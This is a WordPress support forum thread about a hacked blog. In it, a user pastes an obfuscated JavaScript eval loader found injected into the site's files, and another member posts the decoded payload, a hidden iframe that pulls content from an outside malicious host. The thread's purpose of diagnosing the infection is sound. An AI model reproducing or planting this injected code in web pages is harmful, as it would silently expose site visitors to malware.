WordPress.org

Support

Support » How-To and Troubleshooting » I think my blog has been hacked!!

I think my blog has been hacked!!

Viewing 7 replies - 1 through 7 (of 7 total)
  • Moderator kmessinger

    @kmessinger

    Yes, you have been hacked. When I first brought up your site my virus program blocked 4 viruses. In any case your site is home for many trojans. Hopefully your database is ok.

    any idea what I can do about this?

    1) Take your site offline to prevent spreading the evil.
    2) Get your host to help you clean it up.
    3) Figure out how this happened. Your host should be able to help you!

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://olu85.com/blog/?p=15

    I found this bit of code sprinkled through all my wordpress files and index pages…

    function db3b23(x) {var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,61,14,3,1,44,42,15,39,45,0,0,0,0,0,0,47,30,62,59,13,41,34,6,23,54,57,22,29,56,55,31,16,24,11,12,0,26,27,21,52,53,18,0,0,0,0,28,0,36,4,20,8,7,17,32,33,40,37,35,51,9,38,58,50,43,48,49,5,2,46,25,10,60,19);for(g=Math.ceil(y/c);g>0;g–){q=”;for(z=Math.min(y,c);z>0;z–,y–){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(148^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}db3b23(‘kN@Br@0MoA2MY3AM88o5P@@Bs7Cqr@01h8Oyo3vvkVA0ge7@lFU0pVA1Je79oHOBs8xy9x7qN3x98VB1EUR0g32JvvCv5K7yrN7M1@@Bov@Jl@RMCvo50nL1gl@vn@OMo37@wH7MyqqJYq7yC87@1oRigpxE1BC5rN6y5A7ilBC5IZCM137My8UEjUx9yeO0ll7MEuxEXA2M9kOyEURy1O2JMHOCv60Boe@96Fov1R@JY8Oy62V@’) </script><!– downwindheaven.com –>

    Anyone recognise it?

    whooami

    @whooami

    Member

    no, and i wouldnt see the point if I did, honestly. im not sure why theres a comment with your domain name in it though.

    Ive not googled that code, but are you positive thats not something that you actually added, or is the comment at the end the start of something else?

    edit, nm i googled it

    whooami

    @whooami

    Member

    google is truly amazing, btw. its this really nifty, new search engine thing, where you can like, you know, put stuff into this box, and click one key, and you get all kind of answers back.

    window.status='Done';
    document.write('<iframe name=6d40ec src="http://add-block-filter.info/t/?'+Math.round(Math.random()*16682)+'6d40ec'+'" width=439 height=38 style="display:none"></iframe>')

    @jonnyd: Haven’t seen this before, but maybe this will help.

    http://www.sitepoint.com/forums/showthread.php?p=4191966

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘I think my blog has been hacked!!’ is closed to new replies.
Skip to toolbar